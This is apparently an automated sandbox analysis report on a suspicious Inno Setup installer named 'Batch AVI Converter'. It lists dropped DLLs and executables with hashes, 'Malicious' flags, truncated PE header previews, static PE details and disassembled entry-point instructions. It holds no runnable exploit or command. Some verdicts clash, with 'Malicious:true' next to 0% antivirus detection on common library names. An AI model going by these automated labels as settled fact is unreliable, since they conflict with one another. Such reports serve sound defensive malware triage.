                                                            C:\Users\user\AppData\Local\Batch AVI Converter\is-FH5VO.tmp

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Category:dropped
                                                            Size (bytes):334848
                                                            Entropy (8bit):6.5257884005400015
                                                            Encrypted:false
                                                            SSDEEP:6144:JmuFcP82IqE5RSbvQpYVgMW2i32blpDW2pmoZ1:JmuFc02IqE7SbLVgR1O
                                                            MD5:C1D465E061D7D02895DAEB19BDB28AC9
                                                            SHA1:5E729EE51DF080545C7031D771B85094A2B2D4E9
                                                            SHA-256:777917D30F277A9E88D8FC04E69B955A2B0BD3F2BCF2E36F7F9CFFEF2583EE60
                                                            SHA-512:438ADAA0AC3AD47621D288E3FF56493CC7DE4E2A89FC5420E246A6045DB79E7CB84A28D3F3420841340AB33BD632F12FDC3A4E9D8EF99601CA9F975B7F8309E1
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#................ ..............a.................................g........ ......................P..Z........j...p..8.......................d............................`......................@................................text...............................`.P`.data...............................@.0..rdata...s.......t..................@.p@.eh_framD....p.......<..............@.0@.bss....H....@........................p..edata..Z....P......................@.0@.idata...j.......l..................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..rsrc...8....p......................@.0..reloc..d........ ..................@.0B........................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Batch AVI Converter\is-NF77P.tmp

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):392048
                                                            Entropy (8bit):6.542831007177094
                                                            Encrypted:false
                                                            SSDEEP:6144:1eIwnft+S34NVSTjMFR+oVbKQfbno1/1oz6i2EDSD4I+XdtQXGMiFcoOjAWcIhbl:1eIwnft+S34NVSTQD+oVbKQfrC/1ct25
                                                            MD5:EE856A00410ECED8CC609936D01F954E
                                                            SHA1:705D378626AEC86FECFDF04C86244006BC3AF431
                                                            SHA-256:B6192300D3C1476EF3C25A368D055AA401035E78F9F6DBE5F93C84D36EF1FA62
                                                            SHA-512:666D731247DAEAE4B57925DFA8CAE845327FD34E0F6B9AAD1BCF471D1800D7E8AF5642A5FB6E0EC58BA3AC7DD98A6D3FE0B473F34C16FFB9985621C98C0463EF
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../.v[N.%[N.%[N.%4*.$QN.%4*.$.N.%4*.$IN.%4*.$YN.%.*.$HN.%.*.$GN.%.*.$KN.%.*.$XN.%[N.%.O.%.*.$iN.%.*.$ZN.%.*e%ZN.%.*.$ZN.%Rich[N.%........PE..L...D.r^...........!.....8..........^7.......P......................................'.....@..........................6..<)..L_..<.......X...............p3.......3..@,..............................`,..@............P...............................text....7.......8.................. ..`.rdata..l....P.......<..............@..@.data....?...p...6...X..............@....rsrc...X...........................@..@.reloc...3.......4..................@..B................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Batch AVI Converter\is-NTR8S.tmp

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1471856
                                                            Entropy (8bit):6.8308189184145665
                                                            Encrypted:false
                                                            SSDEEP:24576:6PQ+KpPa3kPjWWJy+0PX7PM6ZB9In8QmMMWwI6/I+no9R2aFVWKZxPo89/xc3lRc:brWW0jnMVpUBuwemQnGP8RqYr1mpbk3
                                                            MD5:A236287C42F921D109475D47E9DCAC2B
                                                            SHA1:6D7C177A0AC3076383669BCE46608EB4B6B787EC
                                                            SHA-256:63AA600A7C914C2D59280069169CC93E750E42C9A1146E238C9128E073D578FD
                                                            SHA-512:C325B12235AD77937E3799F1406EB6AA3BC5479BFDFF0EA2F2178FE243E63689AC37BB539ADCBB326B0DE6C09B884771AD57F59184A5B69065682855382ADD8A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A.W.A.W.A.W.%.V.A.W.%.VeA.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.A.WUA.W.A.W.A.W2%.V.C.W2%.V.A.W2%.W.A.W2%.V.A.WRich.A.W................PE..L.....r^...........!.....v...............................................................@..........................r......H*..x.......X............B..p3..........@e..............................`e..@............................................text....u.......v.................. ..`.rdata..............z..............@..@.data........@...j... ..............@....rsrc...X...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Batch AVI Converter\is-O4BPT.tmp

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):348160
                                                            Entropy (8bit):6.542655141037356
                                                            Encrypted:false
                                                            SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                            MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                            SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                            SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                            SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Batch AVI Converter\libeay32.dll (copy)

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1471856
                                                            Entropy (8bit):6.8308189184145665
                                                            Encrypted:false
                                                            SSDEEP:24576:6PQ+KpPa3kPjWWJy+0PX7PM6ZB9In8QmMMWwI6/I+no9R2aFVWKZxPo89/xc3lRc:brWW0jnMVpUBuwemQnGP8RqYr1mpbk3
                                                            MD5:A236287C42F921D109475D47E9DCAC2B
                                                            SHA1:6D7C177A0AC3076383669BCE46608EB4B6B787EC
                                                            SHA-256:63AA600A7C914C2D59280069169CC93E750E42C9A1146E238C9128E073D578FD
                                                            SHA-512:C325B12235AD77937E3799F1406EB6AA3BC5479BFDFF0EA2F2178FE243E63689AC37BB539ADCBB326B0DE6C09B884771AD57F59184A5B69065682855382ADD8A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A.W.A.W.A.W.%.V.A.W.%.VeA.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.A.WUA.W.A.W.A.W2%.V.C.W2%.V.A.W2%.W.A.W2%.V.A.WRich.A.W................PE..L.....r^...........!.....v...............................................................@..........................r......H*..x.......X............B..p3..........@e..............................`e..@............................................text....u.......v.................. ..`.rdata..............z..............@..@.data........@...j... ..............@....rsrc...X...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Batch AVI Converter\libssl-1_1.dll (copy)

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):719720
                                                            Entropy (8bit):6.620042925263483
                                                            Encrypted:false
                                                            SSDEEP:12288:ST+z0ucMr64M+yiwUqfWY/EThHzgOXfpwN9Cu66vLHL1e13XYFU8HtUDsMBPxtFe:FPAeKLL1e6kpqsookesEiU1xJycD4R1z
                                                            MD5:20B6B06BBD211A8ACFE51193653E4167
                                                            SHA1:817D442B46DD6F35FD9641E0C7262C934ED76848
                                                            SHA-256:7A16E6ED0C0A49AEB8EA4972600A7A1422C92550602A150634B1C221F79300B4
                                                            SHA-512:0F0C31D46E7274F28F62AFBBB4A172CB088AF40F6C71A56297B08D83D16548C0A4FDA4CF5F4A29C1445EEDF15FE81FC405E2EB8680F92C744406D031A05A72C8
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+X?|o9Q/o9Q/o9Q/{RR.e9Q/{RT..9Q/{RU.}9Q/{RP.m9Q/=QT.r9Q/=QU.`9Q/=QR.z9Q/.PP.l9Q/o9P/j;Q/.PU.C9Q/.PQ.n9Q/.P./n9Q/.PS.n9Q/Richo9Q/................PE..L...3..c...........!.....d...~......Z........................................ .......9....@.............................4@...)..<.......................h).......S..@...T...............................@............................................text...Lb.......d.................. ..`.rdata...............h..............@..@.data...`I...`...6...D..............@....rsrc................z..............@..@.reloc...S.......T...~..............@..B........................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Batch AVI Converter\msvcp71.dll (copy)

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):499712
                                                            Entropy (8bit):6.414789978441117
                                                            Encrypted:false
                                                            SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                            MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                            SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                            SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                            SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Batch AVI Converter\msvcr71.dll (copy)

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):348160
                                                            Entropy (8bit):6.542655141037356
                                                            Encrypted:false
                                                            SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                            MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                            SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                            SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                            SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Batch AVI Converter\ssleay32.dll (copy)

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):392048
                                                            Entropy (8bit):6.542831007177094
                                                            Encrypted:false
                                                            SSDEEP:6144:1eIwnft+S34NVSTjMFR+oVbKQfbno1/1oz6i2EDSD4I+XdtQXGMiFcoOjAWcIhbl:1eIwnft+S34NVSTQD+oVbKQfrC/1ct25
                                                            MD5:EE856A00410ECED8CC609936D01F954E
                                                            SHA1:705D378626AEC86FECFDF04C86244006BC3AF431
                                                            SHA-256:B6192300D3C1476EF3C25A368D055AA401035E78F9F6DBE5F93C84D36EF1FA62
                                                            SHA-512:666D731247DAEAE4B57925DFA8CAE845327FD34E0F6B9AAD1BCF471D1800D7E8AF5642A5FB6E0EC58BA3AC7DD98A6D3FE0B473F34C16FFB9985621C98C0463EF
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../.v[N.%[N.%[N.%4*.$QN.%4*.$.N.%4*.$IN.%4*.$YN.%.*.$HN.%.*.$GN.%.*.$KN.%.*.$XN.%[N.%.O.%.*.$iN.%.*.$ZN.%.*e%ZN.%.*.$ZN.%Rich[N.%........PE..L...D.r^...........!.....8..........^7.......P......................................'.....@..........................6..<)..L_..<.......X...............p3.......3..@,..............................`,..@............P...............................text....7.......8.................. ..`.rdata..l....P.......<..............@..@.data....?...p...6...X..............@....rsrc...X...........................@..@.reloc...3.......4..................@..B................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Batch AVI Converter\unins000.dat

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:InnoSetup Log Batch AVI Converter, version 0x30, 4489 bytes, 066656\user, "C:\Users\user\AppData\Local\Batch AVI Converter"
                                                            Category:dropped
                                                            Size (bytes):4489
                                                            Entropy (8bit):4.630872219335591
                                                            Encrypted:false
                                                            SSDEEP:96:899zgNdWO38Dp0edSG9U+eOIhUEmD/QH4cVSQs0L+Q4u424V4S4M424cUIz:8998dWO3op0edRHIhUEmzQYcVSQ1+Qla
                                                            MD5:E01145EE3B3B89226E6116EBC0C6B453
                                                            SHA1:F58A9967077BEC22F3275745ED4E639306065EE8
                                                            SHA-256:557AACD4007C59F4975F0FD735F1E4B8938757EF5A0416F5E82291571871455A
                                                            SHA-512:99108BC1FACBDFE71A1505B499DD8F1D5BF2F8E329B972A4ACD6009954A76BBA48BAA9F764EEE631BCF3F145B67BC140DD4A1394DFB3716A07AEFE74D44EFEF4
                                                            Malicious:false
                                                            Preview:Inno Setup Uninstall Log (b)....................................Batch AVI Converter.............................................................................................................Batch AVI Converter.............................................................................................................0...........%...............................................................................................................N..-....B....4........R....066656.user1C:\Users\user\AppData\Local\Batch AVI Converter.................. .....v......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User

                                                            C:\Users\user\AppData\Local\Batch AVI Converter\unins000.exe (copy)

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):717985
                                                            Entropy (8bit):6.514913383862237
                                                            Encrypted:false
                                                            SSDEEP:12288:6TPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+aIq5MRxyFA:SPcYn5c/rPx37/zHBA6pFptZ1CELqMRJ
                                                            MD5:B07AF47E786B74FA5BD4F50FB05090A4
                                                            SHA1:E14A663A6E0CCC6D0D767178053740CDAC1B5A84
                                                            SHA-256:60481C96BCE7CBB54A8ACF839416CEE2718E4FA7A9720DFE70972E1B5ED12E9F
                                                            SHA-512:47E44D559485865EAE1E23BFCC9FE512DFA00D6278553C0AD3168B426A1DE9B400811A058E3DC23B349A16DD030410A4F530DECADF37352E12C43A3F20F37E2A
                                                            Malicious:true
                                                            Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp

                                                            Download File
                                                            Process:C:\Users\user\Desktop\file.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):706560
                                                            Entropy (8bit):6.5063706111129225
                                                            Encrypted:false
                                                            SSDEEP:12288:yTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+aIq5MRxyF:6PcYn5c/rPx37/zHBA6pFptZ1CELqMRU
                                                            MD5:F02C8C4B73C31FD56FD90DC77235363B
                                                            SHA1:8438360794AB53372730AFAFC976925B51D135AB
                                                            SHA-256:8A8EEBE5D778B9DA7C563719CDE8DAC42B9D0C534827A5F979A6C09E3834B351
                                                            SHA-512:3A8238A412EBC9574F1C34EE8371F0C49DCBEC43AA674EAAA98DAE11280B1046C94F7545DAD5B87D7AE29B34BB78E18FDD17D982915D99F2FAE113AC96D30E66
                                                            Malicious:true
                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_iscrypt.dll

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):2560
                                                            Entropy (8bit):2.8818118453929262
                                                            Encrypted:false
                                                            SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                            MD5:A69559718AB506675E907FE49DEB71E9
                                                            SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                            SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                            SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_isdecmp.dll

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):13312
                                                            Entropy (8bit):5.745960477552938
                                                            Encrypted:false
                                                            SSDEEP:384:BXvhMwoSitz/bjx7yxnbdn+EHvbsHoOODCg:BZ7FEAbd+EDsIO
                                                            MD5:A813D18268AFFD4763DDE940246DC7E5
                                                            SHA1:C7366E1FD925C17CC6068001BD38EAEF5B42852F
                                                            SHA-256:E19781AABE466DD8779CB9C8FA41BBB73375447066BB34E876CF388A6ED63C64
                                                            SHA-512:B310ED4CD2E94381C00A6A370FCB7CC867EBE425D705B69CAAAAFFDAFBAB91F72D357966916053E72E68ECF712F2AF7585500C58BB53EC3E1D539179FCB45FB4
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(............................@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_setup64.tmp

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):6144
                                                            Entropy (8bit):4.289297026665552
                                                            Encrypted:false
                                                            SSDEEP:48:Sv1LfWvPcXegCPUo1vlZQrAxoONfHFZONfH3d1xCWMBFNL2pGSS4k+bkg6j0KHc:wfkcXegaJ/ZAYNzcld1xaX12pfSKvkc
                                                            MD5:C8871EFD8AF2CF4D9D42D1FF8FADBF89
                                                            SHA1:D0EACD5322C036554D509C7566F0BCC7607209BD
                                                            SHA-256:E4FC574A01B272C2D0AED0EC813F6D75212E2A15A5F5C417129DD65D69768F40
                                                            SHA-512:2735BB610060F749E26ACD86F2DF2B8A05F2BDD3DCCF3E4B2946EBB21BA0805FB492C474B1EEB2C5B8BF1A421F7C1B8728245F649C644F4A9ECC5BD8770A16F6
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....HP..........#............................@.............................`..............................................................<!.......P.......@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_shfoldr.dll

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Category:dropped
                                                            Size (bytes):23312
                                                            Entropy (8bit):4.596242908851566
                                                            Encrypted:false
                                                            SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                            MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                            SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                            SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                            SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.997770334607748
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 98.73%
                                                            • Inno Setup installer (109748/4) 1.08%
                                                            • Windows Screen Saver (13104/52) 0.13%
                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            File name:file.exe
                                                            File size:3'488'773 bytes
                                                            MD5:984c885de9fea28a60a25b278f424f50
                                                            SHA1:5971c05829104cb0dd47de9fb8806762c141f081
                                                            SHA256:5fe11452c901b9eb15809a33ecc6bb94c9d1ec87553708eac94ad19969cbaa8c
                                                            SHA512:8a2df01a795ede330f7d05b97e79ca48bff366c2ea9d3dbc27dbda9d6435e5cf4208019f97f104a23138c5681a173245557daf8749697263e6966d98213db18b
                                                            SSDEEP:49152:C9e8wILoaKF9q/1t2GpCKqsA15dXEGGgXH9AJ1ukBb1DGdg1TK2l7fghCy:M5w17ou5GgXH9AXz1e2BIky
                                                            TLSH:80F5332026444F31E0B397BA2F19E62562273ED622B86822F7D4663DCF3F5598433776
                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                            File Icon

                                                            Icon Hash:2d2e3797b32b2b99

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x40a5f8
                                                            Entrypoint Section:CODE
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:1
                                                            OS Version Minor:0
                                                            File Version Major:1
                                                            File Version Minor:0
                                                            Subsystem Version Major:1
                                                            Subsystem Version Minor:0
                                                            Import Hash:884310b1928934402ea6fec1dbd3cf5e

                                                            Entrypoint Preview

                                                            Instruction
                                                            push ebp
                                                            mov ebp, esp
                                                            add esp, FFFFFFC4h
                                                            push ebx
                                                            push esi
                                                            push edi
                                                            xor eax, eax
                                                            mov dword ptr [ebp-10h], eax
                                                            mov dword ptr [ebp-24h], eax
                                                            call 00007F749083F333h
                                                            call 00007F749084053Ah
                                                            call 00007F74908407C9h
                                                            call 00007F749084086Ch
                                                            call 00007F749084280Bh
                                                            call 00007F7490845176h
                                                            call 00007F74908452DDh
                                                            xor eax, eax
                                                            push ebp
                                                            push 0040ACC9h
                                                            push dword ptr fs:[eax]
                                                            mov dword ptr fs:[eax], esp
                                                            xor edx, edx
                                                            push ebp
                                                            push 0040AC92h
                                                            push dword ptr fs:[edx]
                                                            mov dword ptr fs:[edx], esp
                                                            mov eax, dword ptr [0040C014h]
                                                            call 00007F7490845D8Bh
                                                            call 00007F7490845976h
                                                            cmp byte ptr [0040B234h], 00000000h
                                                            je 00007F749084686Eh
                                                            call 00007F7490845E88h
                                                            xor eax, eax
                                                            call 00007F7490840029h
                                                            lea edx, dword ptr [ebp-10h]
                                                            xor eax, eax
                                                            call 00007F7490842E1Bh
                                                            mov edx, dword ptr [ebp-10h]
                                                            mov eax, 0040CE28h
                                                            call 00007F749083F3CAh
                                                            push 00000002h
                                                            push 00000000h
                                                            push 00000001h
                                                            mov ecx, dword ptr [0040CE28h]
                                                            mov dl, 01h
                                                            mov eax, 0040738Ch
                                                            call 00007F74908436AAh
                                                            mov dword ptr [0040CE2Ch], eax
                                                            xor edx, edx
                                                            push ebp
                                                            push 0040AC4Ah
                                                            push dword ptr fs:[edx]
                                                            mov dword ptr fs:[edx], esp
                                                            call 00007F7490845DE6h
                                                            mov dword ptr [0040CE34h], eax
                                                            mov eax, dword ptr [0040CE34h]
                                                            cmp dword ptr [eax+0Ch], 00000000h

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
